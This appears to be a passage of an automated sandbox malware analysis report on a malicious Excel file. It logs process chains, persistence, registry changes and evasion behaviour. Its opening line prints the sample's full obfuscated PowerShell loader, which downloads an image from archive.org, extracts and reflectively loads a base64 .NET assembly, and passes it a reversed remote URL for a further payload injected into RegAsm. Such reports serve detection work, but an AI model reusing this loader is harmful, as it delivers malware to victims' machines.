                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 30_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE8995022D push eax; iretd 7_2_000007FE89950241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_000007FE8992223D push eax; ret 14_2_000007FE89922271
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_000007FE8992022D push eax; iretd 14_2_000007FE89920241
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10002806 push ecx; ret 17_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044693D push ecx; ret 21_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_00451D54 push eax; ret 21_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_0044B090 push eax; ret 23_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_0044B090 push eax; ret 23_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00451D34 push eax; ret 23_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00444E71 push ecx; ret 23_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00414060 push eax; ret 24_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00414060 push eax; ret 24_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00414039 push ecx; ret 24_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004164EB push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00416553 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00416555 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004470B7 push eax; retf 0046h 30_2_004470B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00457186 push ecx; ret 30_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0045E55D push esi; ret 30_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00457AA8 push eax; ret 30_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00434EB6 push ecx; ret 30_2_00434EC9

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00406EEB ShellExecuteW,URLDownloadToFileW, 30_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 30_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 30_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: QPS-36477.xls Stream path 'MBD001CA3FC/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: QPS-36477.xls Stream path 'Workbook' entropy: 7.9987635045 (max. 8.0)
                    Source: 58430000.0.dr Stream path 'MBD001CA3FC/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                    Source: 58430000.0.dr Stream path 'Workbook' entropy: 7.99878038771 (max. 8.0)

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040F7E2 Sleep,ExitProcess,30_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,30_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8298
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1446
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2306
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4042
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1751
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 901
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 8713
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1688
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1415
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3730
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 488
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 870
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1198
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3618
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 7.2 %
                    Source: C:\Windows\System32\mshta.exe TID: 3784 Thread sleep time: -360000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916 Thread sleep count: 8298 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916 Thread sleep count: 1446 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960 Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3932 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2236 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2744 Thread sleep count: 4042 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2972 Thread sleep count: 1751 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\mshta.exe TID: 1080 Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120 Thread sleep count: 136 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120 Thread sleep time: -68000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048 Thread sleep count: 901 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048 Thread sleep time: -2703000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3412 Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048 Thread sleep count: 8713 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048 Thread sleep time: -26139000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2440 Thread sleep count: 1415 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892 Thread sleep count: 3730 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184 Thread sleep time: -300000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2204 Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3768 Thread sleep count: 1198 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep count: 3618 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 Thread sleep time: -1200000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 536 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_0040928E
